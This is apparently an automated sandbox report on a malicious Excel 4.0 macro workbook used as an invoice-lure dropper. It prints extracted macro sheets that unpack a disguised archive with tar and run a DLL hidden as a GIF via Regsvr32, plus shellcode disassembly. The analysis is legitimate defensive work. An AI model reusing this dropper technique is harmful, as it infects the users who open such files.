Verdict: MALICIOUS (Risk Score: 330)

Malware Insights

MITRE ATT&CK:
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
This Excel document contains Excel 4.0 macro sheets with Auto_Open defined names, indicating it is designed to execute code upon opening. The document body prompts the user to 'enable editing and content mode for invoice calculation', a common lure to bypass macro security. The macros utilize dangerous functions like EXEC and GOTO, which can be used to download and execute arbitrary code. The presence of LoadLibrary and GetProcAddress API references further suggests dynamic code loading.
Heuristics (9)

- [critical] OOXML_XLM_MACROSHEET: Excel 4.0 macro sheet (3 sheet(s)), 2 related findings. Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
- [critical] OOXML_XLM_AUTOOPEN_DEFINEDNAME: Excel 4.0 Auto_Open defined name. Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
- [critical] OOXML_XLM_DANGEROUS_FN: Dangerous XLM formula APIs: GOTO, EXEC, HALT. Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
- [high] SC_PEB_ACCESS: PEB access via FS segment (x86).
Disassembly (attempted x86 opcode disassembly supporting the SC_PEB_ACCESS finding):

```asm
0008948F 64a130000000  mov eax, dword ptr fs:[0x30]        ; fs:[0x30] is the PEB pointer on 32-bit Windows
00089495 894508        mov dword ptr [ebp + 8], eax
00089498 8b4d08        mov ecx, dword ptr [ebp + 8]
0008949B 8b5618        mov edx, dword ptr [esi + 0x18]
0008949E 895108        mov dword ptr [ecx + 8], edx
000894A1 8b4e04        mov ecx, dword ptr [esi + 4]
000894A4 8b4928        mov ecx, dword ptr [ecx + 0x28]
000894A7 034e18        add ecx, dword ptr [esi + 0x18]
000894AA ffd1          call ecx
000894AC 6a00          push 0
000894AE ff563c        call dword ptr [esi + 0x3c]
000894B1 33c0          xor eax, eax
000894B3 40            inc eax
000894B4 eb02          jmp 0x894b8
000894B6 33c0          xor eax, eax
000894B8 5e            pop esi
000894B9 c9            leave
000894BA c20400        ret 4
000894BD 55            push ebp
000894BE 8bec          mov ebp, esp
000894C0 51            push ecx
000894C1 8b423c        mov eax, dword ptr [edx + 0x3c]     ; e_lfanew: offset of the NT headers
000894C4 56            push esi
000894C5 8bf1          mov esi, ecx
000894C7 57            push edi
000894C8 8b441050      mov eax, dword ptr [eax + edx + 0x50] ; OptionalHeader.SizeOfImage (PE32)
000894CC 89460c        mov dword ptr [esi + 0xc], eax
000894CF b84d5a0000    mov eax, 0x5a4d                     ; "MZ" DOS header magic
000894D4 895608        mov dword ptr [esi + 8], edx
000894D7 8916          mov dword ptr [esi], edx
000894D9 663902        cmp word ptr [edx], ax
000894DC 755c          jne 0x8953a
000894DE 8b423c        mov eax, dword ptr [edx + 0x3c]
000894E1 bf50450000    mov edi, 0x4550                     ; "PE" NT header signature
000894E6 03c2          add eax, edx
000894E8 894604        mov dword ptr [esi + 4], eax
000894EB 3938          cmp dword ptr [eax], edi
000894ED 754b          jne 0x8953a
```
- [high] SC_STR_LOADLIBRARY: Reference to LoadLibrary API.
- [high] SC_STR_GETPROCADDRESS: Reference to GetProcAddress API.
- [medium] SE_ENABLE_LURE: Macro/content-enable lure. Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings.
- [low] OOXML_HIDDEN_SHEET: Hidden worksheet (hidden). Excel workbook contains 4 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction.
- [info] EMBEDDED_URL: Embedded URL. One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/spreadsheetml/2006/main (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/excel/2006/main (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/spreadsheetml/2014/revision (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/spreadsheetml/2015/revision2 (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/spreadsheetml/2016/revision3 (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/spreadsheetml/2016/revision6 (in document text: OOXML body / shared strings)
Extracted artifacts (3)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| xlm_sheet_00.xml | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet1.xml | 1750 bytes | 16906c43ea71e7ceb95d2718eec32533a2cb6af3357ce8a6142e8a664da0db88 |
| xlm_sheet_01.xml | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet2.xml | 1855 bytes | 36317a1726fcc0ea4f4b9877cdd923b9a162e77bfb18441186d29aec7144a8de |
| xlm_sheet_02.xml | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet3.xml | 2339 bytes | 31f588c7324c4e72af751bb0a95a8d409e0841c96318e2fa41d7e0a83f2289dc |

Preview of xlm_sheet_00.xml (first 1,000 lines of the extracted script):

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{92BAA9A6-CCD7-4C96-B244-8027D75B3DA4}">
  <dimension ref="H22:I28"/>
  <sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews>
  <sheetFormatPr defaultColWidth="10.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="7" width="10.5703125" style="2"/>
    <col min="8" max="8" width="16.85546875" style="2" bestFit="1" customWidth="1"/>
    <col min="9" max="16384" width="10.5703125" style="2"/>
  </cols>
  <sheetData>
    <row r="22" spans="8:9" x14ac:dyDescent="0.25">
      <c r="I22" s="2" t="s"><v>2</v></c>
    </row>
    <row r="23" spans="8:9" x14ac:dyDescent="0.25">
      <c r="H23" s="2" t="b"><f>SAVE.COPY.AS(I22&I23)</f><v>0</v></c>
      <c r="I23" s="2" t="s"><v>1</v></c>
    </row>
    <row r="28" spans="8:9" x14ac:dyDescent="0.25">
      <c r="H28" s="2" t="e"><f>GOTO(Nolaert!AK19)</f><v>#N/A</v></c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
</xm:macrosheet>
```

Preview of xlm_sheet_01.xml (first 1,000 lines of the extracted script):

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{00000000-0001-0000-0200-000000000000}">
  <dimension ref="AK703:AK717"/>
  <sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews>
  <sheetFormatPr defaultColWidth="13.140625" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="36" width="13.140625" style="2"/>
    <col min="37" max="37" width="37.42578125" style="2" bestFit="1" customWidth="1"/>
    <col min="38" max="16384" width="13.140625" style="2"/>
  </cols>
  <sheetData>
    <row r="703" spans="37:37" s="2" customFormat="1" x14ac:dyDescent="0.25">
      <c r="AK703" s="2" t="b"><f>EXEC(Bkidydj!L15&Bkidydj!L16&Bkidydj!L17)</f><v>0</v></c>
    </row>
    <row r="706" spans="37:37" s="2" customFormat="1" x14ac:dyDescent="0.25">
      <c r="AK706" s="2" t="b"><f>WAIT(NOW()+"00:00:05")</f><v>0</v></c>
    </row>
    <row r="717" spans="37:37" s="2" customFormat="1" x14ac:dyDescent="0.25">
      <c r="AK717" s="2" t="e"><f>GOTO(Bkidydj!G5)</f><v>#N/A</v></c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
</xm:macrosheet>
```

Preview of xlm_sheet_02.xml (first 1,000 lines of the extracted script):

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{72FD7C7A-A3BA-4BD4-A707-DDD14281DB2B}">
  <dimension ref="E14:L30"/>
  <sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews>
  <sheetFormatPr defaultColWidth="9.140625" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="4" width="9.140625" style="2"/>
    <col min="5" max="5" width="27.5703125" style="2" customWidth="1"/>
    <col min="6" max="6" width="9.140625" style="2"/>
    <col min="7" max="7" width="13.28515625" style="2" bestFit="1" customWidth="1"/>
    <col min="8" max="16384" width="9.140625" style="2"/>
  </cols>
  <sheetData>
    <row r="14" spans="7:12" x14ac:dyDescent="0.25">
      <c r="G14" s="2" t="b"><f>EXEC(E29&E30)</f><v>0</v></c>
    </row>
    <row r="15" spans="7:12" x14ac:dyDescent="0.25">
      <c r="L15" s="2" t="str"><f>"tar -x"</f><v>tar -x</v></c>
    </row>
    <row r="16" spans="7:12" x14ac:dyDescent="0.25">
      <c r="L16" s="2" t="str"><f>"f ..\"</f><v>f ..\</v></c>
    </row>
    <row r="17" spans="5:12" x14ac:dyDescent="0.25">
      <c r="L17" s="2" t="str"><f>"Nioka.meposv -C ..\"</f><v>Nioka.meposv -C ..\</v></c>
    </row>
    <row r="19" spans="5:12" x14ac:dyDescent="0.25">
      <c r="G19" s="2" t="b"><f>HALT()</f><v>0</v></c>
    </row>
    <row r="29" spans="5:12" x14ac:dyDescent="0.25">
      <c r="E29" s="2" t="str"><f>"Regs"</f><v>Regs</v></c>
    </row>
    <row r="30" spans="5:12" x14ac:dyDescent="0.25">
      <c r="E30" s="2" t="str"><f>"vr32 -s ..\xl\media\image1.gif"</f><v>vr32 -s ..\xl\media\image1.gif</v></c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
</xm:macrosheet>
```